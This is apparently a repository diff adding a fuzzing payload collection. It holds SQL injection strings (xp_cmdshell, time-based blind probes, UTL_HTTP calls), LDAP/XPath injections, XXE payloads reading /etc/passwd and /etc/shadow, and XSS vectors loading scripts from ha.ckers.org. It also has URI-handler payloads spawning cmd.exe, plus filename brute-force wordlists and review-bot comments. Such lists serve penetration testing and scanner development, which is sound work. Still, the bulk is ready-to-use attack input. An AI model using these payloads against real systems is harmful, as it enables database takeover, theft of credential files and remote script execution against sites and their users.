' or userid like '%
|
||||
' or uid like '%
|
||||
' or user like '%
|
||||
exec xp
|
||||
exec sp
|
||||
'; exec master..xp_cmdshell
|
||||
'; exec xp_regread
|
||||
t'exec master..xp_cmdshell 'nslookup www.google.com'--
|
||||
--sp_password
|
||||
\x27UNION SELECT
|
||||
' UNION SELECT
|
||||
' UNION ALL SELECT
|
||||
' or (EXISTS)
|
||||
' (select top 1
|
||||
'||UTL_HTTP.REQUEST
|
||||
1;SELECT%20*
|
||||
to_timestamp_tz
|
||||
tz_offset
|
||||
<>"'%;)(&+
|
||||
'%20or%201=1
|
||||
%27%20or%201=1
|
||||
%20$(sleep%2050)
|
||||
%20'sleep%2050'
|
||||
char%4039%41%2b%40SELECT
|
||||
'%20OR
|
||||
'sqlattempt1
|
||||
(sqlattempt2)
|
||||
|
|
||||
%7C
|
||||
*|
|
||||
%2A%7C
|
||||
*(|(mail=*))
|
||||
%2A%28%7C%28mail%3D%2A%29%29
|
||||
*(|(objectclass=*))
|
||||
%2A%28%7C%28objectclass%3D%2A%29%29
|
||||
(
|
||||
%28
|
||||
)
|
||||
%29
|
||||
&
|
||||
%26
|
||||
!
|
||||
%21
|
||||
' or 1=1 or ''='
|
||||
' or ''='
|
||||
x' or 1=1 or 'x'='y
|
||||
/
|
||||
//
|
||||
//*
|
||||
*/*
|
||||
a' or 3=3--
|
||||
"a"" or 3=3--"
|
||||
' or 3=3
|
||||
‘ or 3=3 --
|
|
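Review bot: this file is not consistently one SQL entry per line: the `declare @q nvarchar (4000) select @q =` entry has its hex literal wrapped onto the following lines (`0x7700...`, `0`, `031003000270000`), two entries begin with a typographic quote (`‘ or 1=1 --`, `‘ or 3=3 --`) instead of `'`, and the run from `%7C` through `*(|(objectclass=*))` to `//*` and `*/*` is LDAP-filter and XPath material in a file named `sql-injection.txt`. Join the wrapped literal, say in a `#` comment whether the typographic quote is deliberate, and move the non-SQL strings into their own lists so findings are attributed to the right class. The `nslookup www.google.com` and `ping 172.10.1.255` entries also name real external destinations; placeholders would keep test traffic inside the engagement.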
@ -0,0 +1,9 @@
|
|||
# contains statements from jbrofuzz (13 April 2010)
|
||||
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
|
||||
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
|
||||
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
|
||||
'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
|
||||
'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
|
||||
'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' --
|
||||
'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
|
||||
'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --
|
|
@ -0,0 +1,7 @@
|
|||
' or 1=1 --
|
||||
' union (select @@version) --
|
||||
' union (select NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, NULL, NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --
|
|
@ -0,0 +1,11 @@
|
|||
# Contains statements from jbrofuzz (13 April 2010)
|
||||
1
|
||||
1 and user_name() = 'dbo'
|
||||
\'; desc users; --
|
||||
1\'1
|
||||
1' and non_existant_table = '1
|
||||
' or username is not NULL or username = '
|
||||
1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
|
||||
1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
|
||||
1 uni/**/on select all from where
|
||||
|
|
@ -0,0 +1,7 @@
|
|||
# Contains statements from jbrofuzz (13 April 2010)
|
||||
1
|
||||
1'1
|
||||
1 exec sp_ (or exec xp_)
|
||||
1 and 1=1
|
||||
1' and 1=(select count(*) from tablenames); --
|
||||
|
|
@ -0,0 +1,4 @@
|
|||
# contains statements from jbrofuzz
|
||||
'||utl_http.request('httP://192.168.1.1/')||'
|
||||
' || myappadmin.adduser('admin', 'newpass') || '
|
||||
|
BIN
attack-payloads/sql-injection/docs.oracle_cheat.pdf
Normal file
Binary file not shown.
910
attack-payloads/sql-injection/docs.sql_injection_cheatsheet.html
Normal file
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,9 @@
|
|||
admin' --
|
||||
admin' #
|
||||
admin'/*
|
||||
' or 1=1--
|
||||
' or 1=1#
|
||||
' or 1=1/*
|
||||
') or '1'='1--
|
||||
') or ('1'='1--
|
||||
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
|
15
attack-payloads/xml/xml-attacks.txt
Normal file
|
@ -0,0 +1,15 @@
|
|||
count(/child::node())
|
||||
x' or name()='username' or 'x'='y
|
||||
<name>','')); phpinfo(); exit;/*</name>
|
||||
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
|
||||
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:/boot.ini"">]><foo>&xxe;</foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/shadow"">]><foo>&xxe;</foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
|
||||
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
|
||||
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
|
||||
"<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
|
||||
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
|
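Review bot: from the first `"<?xml version=""1.0"" ...` line to the end of the file, every entry is wrapped in outer double quotes with inner quotes doubled, which is CSV escaping left over from an export. Read one entry per line, these strings are not the XML documents they are meant to represent, so either unescape them or state the encoding in a header comment so consumers decode before use. The first two entries, `count(/child::node())` and `x' or name()='username' or 'x'='y`, are also duplicated in `attack-payloads/xpath/xpath-injection.txt`, and the last entry points at an external host (`http://ha.ckers.org/xss.htc`) where a placeholder would be safer.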
10
attack-payloads/xpath/xpath-injection.txt
Normal file
10
attack-payloads/xpath/xpath-injection.txt
Normal file
|
@ -0,0 +1,10 @@
|
|||
' or '1'='1
|
||||
' or ''='
|
||||
x' or 1=1 or 'x'='y
|
||||
/
|
||||
//
|
||||
//*
|
||||
*/*
|
||||
@*
|
||||
count(/child::node())
|
||||
x' or name()='username' or 'x'='y
|
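Review bot: The last two entries, `count(/child::node())` and `x' or name()='username' or 'x'='y`, are also the first two entries of attack-payloads/xml/xml-attacks.txt added in this same commit. Both are XPath expressions, so keep them in this file only; otherwise a run that loads both lists submits each string twice.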
File diff suppressed because it is too large
BIN
attack-payloads/xss/docs.wasc-scriptmapping/images/ff2.png
Normal file
Binary file not shown.
Size: 295 B
BIN
attack-payloads/xss/docs.wasc-scriptmapping/images/ie7.png
Normal file
Binary file not shown.
Size: 289 B
BIN
attack-payloads/xss/docs.wasc-scriptmapping/images/safari3.png
Normal file
Binary file not shown.
Size: 287 B
25
attack-payloads/xss/docs.wasc-scriptmapping/license.txt
Normal file
|
@ -0,0 +1,25 @@
|
|||
Guest Articles Content License
|
||||
Terms and Conditions for Copying, Distributing, and Modifying
|
||||
|
||||
Items other than copying, distributing, and modifying the Content with
|
||||
which this license was distributed (such as using, etc.) are outside the
|
||||
scope of this license.
|
||||
|
||||
1. You may copy and distribute exact replicas of the OpenContent (OC) as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the OC a copy of this License along with the OC. You may at your option charge a fee for the media and/or handling involved in creating a unique copy of the OC for use offline, you may at your option offer instructional support for the OC in exchange for a fee, or you may at your option offer warranty in exchange for a fee. You may not charge a fee for the OC itself. You may not charge a fee for the sole service of providing access to and/or use of the OC via a network (e.g. the Internet), whether it be via the world wide web, FTP, or any other method.
|
||||
|
||||
2. You may modify your copy or copies of the OpenContent or any portion of it, thus forming works based on the Content, and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions:
|
||||
|
||||
a) You must cause the modified content to carry prominent notices stating that you changed it, the exact nature and content of the changes, and the date of any change.
|
||||
|
||||
b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the OC or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License, unless otherwise permitted under applicable Fair Use law.
|
||||
|
||||
These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the OC, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the OC, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Exceptions are made to this requirement to release modified works free of charge under this license only in compliance with Fair Use law where applicable.
|
||||
|
||||
3. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to copy, distribute or modify the OC. These actions are prohibited by law if you do not accept this License. Therefore, by distributing or translating the OC, or by deriving works herefrom, you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or translating the OC.
|
||||
|
||||
NO WARRANTY
|
||||
|
||||
4. BECAUSE THE OPENCONTENT (OC) IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE OC, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE OC "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK OF USE OF THE OC IS WITH YOU. SHOULD THE OC PROVE FAULTY, INACCURATE, OR OTHERWISE UNACCEPTABLE YOU ASSUME THE COST OF ALL NECESSARY REPAIR OR CORRECTION.
|
||||
|
||||
5. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MIRROR AND/OR REDISTRIBUTE THE OC AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE OC, EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
|
||||
|
74
attack-payloads/xss/xss-rsnake.txt
Normal file
|
@ -0,0 +1,74 @@
|
|||
# credit to rsnake
|
||||
<SCRIPT>alert('XSS');</SCRIPT>
|
||||
'';!--"<XSS>=&{()}
|
||||
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
||||
<IMG SRC="javascript:alert('XSS');">
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
||||
<IMG SRC=javascript:alert("XSS")>
|
||||
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
|
||||
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||
SRC=
<IMG 6;avascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC="jav ascript:alert('XSS');">
|
||||
<IMG SRC="jav	ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="  javascript:alert('XSS');">
|
||||
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
|
||||
<IMG SRC="javascript:alert('XSS')"
|
||||
<SCRIPT>a=/XSS/
|
||||
\";alert('XSS');//
|
||||
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
||||
<BODY BACKGROUND="javascript:alert('XSS')">
|
||||
<BODY ONLOAD=alert('XSS')>
|
||||
<IMG DYNSRC="javascript:alert('XSS')">
|
||||
<IMG LOWSRC="javascript:alert('XSS')">
|
||||
<BGSOUND SRC="javascript:alert('XSS');">
|
||||
<BR SIZE="&{alert('XSS')}">
|
||||
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
|
||||
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
||||
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
|
||||
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
||||
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
|
||||
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
||||
<IMG SRC='vbscript:msgbox("XSS")'>
|
||||
<IMG SRC="mocha:[code]">
|
||||
<IMG SRC="livescript:[code]">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
||||
<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
||||
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
||||
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
||||
<TABLE BACKGROUND="javascript:alert('XSS')">
|
||||
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||
<DIV STYLE="width: expression(alert('XSS'));">
|
||||
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
||||
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
||||
<XSS STYLE="xss:expression(alert('XSS'))">
|
||||
exp/*<XSS STYLE='no\xss:noxss("*//*");
|
||||
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
||||
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
||||
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
||||
<BASE HREF="javascript:alert('XSS');//">
|
||||
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
||||
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
|
||||
getURL("javascript:alert('XSS')")
|
||||
a="get";
|
||||
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');">
|
||||
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
|
||||
<HTML><BODY>
|
||||
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
||||
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
||||
<? echo('<SCR)';
|
||||
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
||||
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
|
||||
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
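Review bot: Many entries in this list load a resource from a host the project does not control (`SRC=http://ha.ckers.org/xss.js`, `xss.css`, `scriptlet.html`, `xssmoz.xml`), so any test run in which one of these strings is rendered makes a request to that third party and runs whatever it serves at the time. Replace the host with a documented placeholder that the tester points at a server they operate, and say so next to the `# credit to rsnake` header line.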
6
attack-payloads/xss/xss-uri.txt
Normal file
|
@ -0,0 +1,6 @@
|
|||
# Contains statements from jbrofuzz (13 April 2010)
|
||||
aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
|
||||
firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
|
||||
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
|
||||
res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
|
||||
|
8
discovery/filename-bruteforce/copy_of.txt
Normal file
|
@ -0,0 +1,8 @@
|
|||
Copy_(1)_of_
|
||||
Copy_(2)_of_
|
||||
Copy%20of%20
|
||||
Copy_of_
|
||||
Copy_
|
||||
Copy%20
|
||||
_
|
||||
%20
|
|
@ -0,0 +1,13 @@
|
|||
backup
|
||||
bck
|
||||
old
|
||||
save
|
||||
bak
|
||||
sav
|
||||
~
|
||||
copy
|
||||
old
|
||||
orig
|
||||
tmp
|
||||
txt
|
||||
back
|
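Review bot: `old` is listed twice in this 13-line list (third and ninth entries). Drop the second occurrence so a scan built from the list does not request the same candidate twice.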
|
@ -0,0 +1,863 @@
|
|||
$er
|
||||
123
|
||||
1pe
|
||||
1ph
|
||||
3dr
|
||||
3dt
|
||||
3me
|
||||
3pe
|
||||
4dl
|
||||
4dv
|
||||
8xk
|
||||
^^^
|
||||
a3l
|
||||
a3m
|
||||
a3w
|
||||
a4l
|
||||
a4m
|
||||
a4w
|
||||
a5l
|
||||
a5w
|
||||
a65
|
||||
aao
|
||||
ab
|
||||
ab1
|
||||
ab2
|
||||
ab3
|
||||
abcd
|
||||
abi
|
||||
abp
|
||||
aby
|
||||
aca
|
||||
acc
|
||||
accdb
|
||||
acf
|
||||
acg
|
||||
ade
|
||||
adp
|
||||
adt
|
||||
adx
|
||||
aft
|
||||
agd
|
||||
aifb
|
||||
alc
|
||||
ald
|
||||
ali
|
||||
amb
|
||||
amsorm
|
||||
an1
|
||||
anme
|
||||
apr
|
||||
arc
|
||||
arh
|
||||
ask
|
||||
asm
|
||||
ast
|
||||
at5
|
||||
att
|
||||
aw
|
||||
awg
|
||||
azw
|
||||
bafl
|
||||
bci
|
||||
bcm
|
||||
bdf
|
||||
bdic
|
||||
bfx
|
||||
bgl
|
||||
bgt
|
||||
bin
|
||||
bjo
|
||||
bk
|
||||
bkk
|
||||
blb
|
||||
bld
|
||||
blg
|
||||
bok
|
||||
box
|
||||
brd
|
||||
brw
|
||||
btf
|
||||
btif
|
||||
btm
|
||||
btr
|
||||
cap
|
||||
cat
|
||||
cbg
|
||||
cch
|
||||
ccr
|
||||
cct
|
||||
cdb
|
||||
cdd
|
||||
cdf
|
||||
cdp
|
||||
cdr
|
||||
cdx
|
||||
cel
|
||||
celtx
|
||||
chg
|
||||
chk
|
||||
chn
|
||||
ckd
|
||||
ckt
|
||||
cl2
|
||||
cl4
|
||||
clb
|
||||
clix
|
||||
clm
|
||||
clp
|
||||
cmbl
|
||||
cna
|
||||
contact
|
||||
cpi
|
||||
cpmz
|
||||
crd
|
||||
crtx
|
||||
csa
|
||||
csv
|
||||
ctf
|
||||
ctt
|
||||
cursorfx
|
||||
curxptheme
|
||||
cvd
|
||||
cvn
|
||||
cwk
|
||||
cws
|
||||
cwz
|
||||
cxt
|
||||
cyo
|
||||
cys
|
||||
daf
|
||||
dal
|
||||
dam
|
||||
das
|
||||
dat
|
||||
data
|
||||
db
|
||||
db2
|
||||
db3
|
||||
dbc
|
||||
dbd
|
||||
dbf
|
||||
dbx
|
||||
dcf
|
||||
dcl
|
||||
dcm
|
||||
dcmd
|
||||
ddc
|
||||
ddcx
|
||||
ddt
|
||||
dem
|
||||
des
|
||||
dex
|
||||
dfm
|
||||
dfproj
|
||||
dft
|
||||
dgb
|
||||
dif
|
||||
dii
|
||||
dlg
|
||||
dm2
|
||||
dmo
|
||||
dmsk
|
||||
dnc
|
||||
dockzip
|
||||
dp1
|
||||
dpn
|
||||
dpx
|
||||
drl
|
||||
dsb
|
||||
dsd
|
||||
dsk
|
||||
dsy
|
||||
dsz
|
||||
dt0
|
||||
dt1
|
||||
dt2
|
||||
dta
|
||||
dtr
|
||||
dvdproj
|
||||
dvo
|
||||
dwi
|
||||
e00
|
||||
eap
|
||||
ebuild
|
||||
ec0
|
||||
eco
|
||||
ecx
|
||||
edb
|
||||
edf
|
||||
eep
|
||||
efx
|
||||
egp
|
||||
emb
|
||||
emd
|
||||
emlxpart
|
||||
enc
|
||||
enw
|
||||
epp
|
||||
epub
|
||||
epw
|
||||
er1
|
||||
esp
|
||||
ess
|
||||
est
|
||||
esx
|
||||
et
|
||||
eta
|
||||
etd
|
||||
etl
|
||||
ev
|
||||
ev3
|
||||
evt
|
||||
evy
|
||||
exif
|
||||
exp
|
||||
exx
|
||||
fa
|
||||
fasta
|
||||
fbl
|
||||
fcd
|
||||
fcs
|
||||
fdb
|
||||
ffd
|
||||
ffwp
|
||||
fhc
|
||||
fid
|
||||
fil
|
||||
flame
|
||||
fll
|
||||
flo
|
||||
flp
|
||||
flt
|
||||
fm
|
||||
fm5
|
||||
fmp
|
||||
fo
|
||||
fob
|
||||
fol
|
||||
fop
|
||||
fox
|
||||
fp
|
||||
fp3
|
||||
fp4
|
||||
fp5
|
||||
fp7
|
||||
frl
|
||||
frm
|
||||
fro
|
||||
frx
|
||||
fsb
|
||||
fsc
|
||||
ftm
|
||||
ftw
|
||||
gan
|
||||
gbr
|
||||
gc
|
||||
gcx
|
||||
gdb
|
||||
ged
|
||||
gedcom
|
||||
gen
|
||||
ggb
|
||||
gml
|
||||
gms
|
||||
gno
|
||||
gnp
|
||||
gp3
|
||||
gpi
|
||||
gps
|
||||
gpx
|
||||
gra
|
||||
grade
|
||||
grf
|
||||
grib
|
||||
grk
|
||||
grr
|
||||
grv
|
||||
gs
|
||||
gst
|
||||
gtp
|
||||
gwk
|
||||
gxl
|
||||
hcc
|
||||
hce
|
||||
hci
|
||||
hcp
|
||||
hcr
|
||||
hcu
|
||||
hda
|
||||
hdb
|
||||
hdf
|
||||
hdi
|
||||
hdl
|
||||
hif
|
||||
hl
|
||||
hml
|
||||
hmt
|
||||
hs2
|
||||
hsk
|
||||
hst
|
||||
htg
|
||||
huh
|
||||
hyv
|
||||
i5z
|
||||
ib
|
||||
ics
|
||||
id2
|
||||
idx
|
||||
igc
|
||||
ihx
|
||||
ii
|
||||
iif
|
||||
img
|
||||
imt
|
||||
ink
|
||||
inp
|
||||
ins
|
||||
ip
|
||||
irock
|
||||
irr
|
||||
irx
|
||||
isf
|
||||
itdb
|
||||
itl
|
||||
itm
|
||||
itn
|
||||
itw
|
||||
itx
|
||||
ivt
|
||||
iw
|
||||
ixb
|
||||
jasper
|
||||
jdb
|
||||
jef
|
||||
jmp
|
||||
jnt
|
||||
job
|
||||
joboptions
|
||||
joined
|
||||
jph
|
||||
jrprint
|
||||
jrxml
|
||||
jude
|
||||
kap
|
||||
kdb
|
||||
kid
|
||||
kismac
|
||||
kmz
|
||||
kpf
|
||||
kpp
|
||||
kpr
|
||||
kpx
|
||||
kpz
|
||||
l
|
||||
l6t
|
||||
laccdb
|
||||
lbl
|
||||
lbx
|
||||
lcd
|
||||
lcf
|
||||
lcm
|
||||
ldif
|
||||
lex
|
||||
lgc
|
||||
lgf
|
||||
lgh
|
||||
lgi
|
||||
lgl
|
||||
lib
|
||||
lif
|
||||
livereg
|
||||
liveupdate
|
||||
lix
|
||||
llb
|
||||
lms
|
||||
lmx
|
||||
lnt
|
||||
loc
|
||||
lp7
|
||||
lrf
|
||||
lrs
|
||||
lrx
|
||||
lsf
|
||||
lsl
|
||||
lsp
|
||||
lsr
|
||||
lst
|
||||
lsu
|
||||
lvm
|
||||
lw4
|
||||
ly
|
||||
m
|
||||
mag
|
||||
mai
|
||||
map
|
||||
masseffectprofile
|
||||
mat
|
||||
mbb
|
||||
mbf
|
||||
mbg
|
||||
mbl
|
||||
mbp
|
||||
mbx
|
||||
mc1
|
||||
mc9
|
||||
mcd
|
||||
md
|
||||
mdb
|
||||
mdc
|
||||
mdf
|
||||
mdl
|
||||
mdm
|
||||
mdn
|
||||
mdt
|
||||
mdx
|
||||
mdz
|
||||
mem
|
||||
menc
|
||||
met
|
||||
mex
|
||||
mfo
|
||||
mfp
|
||||
mgc
|
||||
mls
|
||||
mm
|
||||
mmap
|
||||
mmc
|
||||
mmf
|
||||
mmp
|
||||
mnc
|
||||
mng
|
||||
mnk
|
||||
mno
|
||||
mny
|
||||
mobi
|
||||
moho
|
||||
mosaic
|
||||
mox
|
||||
mpd
|
||||
mpj
|
||||
mpp
|
||||
mpt
|
||||
mpx
|
||||
mpz
|
||||
mq4
|
||||
ms10
|
||||
mth
|
||||
mtw
|
||||
mud
|
||||
muf
|
||||
mw
|
||||
mwf
|
||||
mws
|
||||
mwx
|
||||
mxd
|
||||
myd
|
||||
myi
|
||||
nb
|
||||
nc
|
||||
ndf
|
||||
ndk
|
||||
ndx
|
||||
net
|
||||
neta
|
||||
nfo
|
||||
nitf
|
||||
nmind
|
||||
not
|
||||
notebook
|
||||
np
|
||||
npl
|
||||
npt
|
||||
nrl
|
||||
ns2
|
||||
ns3
|
||||
ns4
|
||||
nsf
|
||||
ntx
|
||||
numbers
|
||||
nvl
|
||||
nyf
|
||||
oab
|
||||
obj
|
||||
odb
|
||||
odf
|
||||
odp
|
||||
ods
|
||||
odx
|
||||
oeaccount
|
||||
ofc
|
||||
ofm
|
||||
oft
|
||||
ofx
|
||||
omcs
|
||||
omp
|
||||
ond
|
||||
one
|
||||
oo3
|
||||
opf
|
||||
opx
|
||||
or2
|
||||
or3
|
||||
or4
|
||||
or5
|
||||
or6
|
||||
org
|
||||
orx
|
||||
otf
|
||||
otl
|
||||
otln
|
||||
ots
|
||||
out
|
||||
ov2
|
||||
ova
|
||||
ovf
|
||||
p96
|
||||
p97
|
||||
pab
|
||||
paf
|
||||
pan
|
||||
pbd
|
||||
pc
|
||||
pcap
|
||||
pcb
|
||||
pcr
|
||||
pd4
|
||||
pd5
|
||||
pdas
|
||||
pdb
|
||||
pdd
|
||||
pdm
|
||||
pds
|
||||
pdx
|
||||
peb
|
||||
pec
|
||||
pep
|
||||
pex
|
||||
pfc
|
||||
pfl
|
||||
phb
|
||||
phm
|
||||
pi
|
||||
pis
|
||||
pjx
|
||||
pka
|
||||
pkb
|
||||
pkh
|
||||
pks
|
||||
pkt
|
||||
pln
|
||||
plw
|
||||
pmo
|
||||
pmr
|
||||
pnproj
|
||||
pnpt
|
||||
pns
|
||||
pnt
|
||||
pod
|
||||
poi
|
||||
pos
|
||||
postal
|
||||
pot
|
||||
potm
|
||||
potx
|
||||
pp2
|
||||
ppf
|
||||
pps
|
||||
ppsx
|
||||
ppt
|
||||
pptm
|
||||
pptx
|
||||
prc
|
||||
pre
|
||||
prf
|
||||
prj
|
||||
prm
|
||||
prs
|
||||
psa
|
||||
psf
|
||||
psm
|
||||
pst
|
||||
ptb
|
||||
ptf
|
||||
ptk
|
||||
ptm
|
||||
ptn
|
||||
ptt
|
||||
ptz
|
||||
pvl
|
||||
pwd
|
||||
pxj
|
||||
pxl
|
||||
q07
|
||||
q08
|
||||
q09
|
||||
q3d
|
||||
qbw
|
||||
qdat
|
||||
qdf
|
||||
qdfm
|
||||
qel
|
||||
qfx
|
||||
qif
|
||||
qpb
|
||||
qpf
|
||||
qph
|
||||
qpm
|
||||
qpw
|
||||
qrp
|
||||
qsd
|
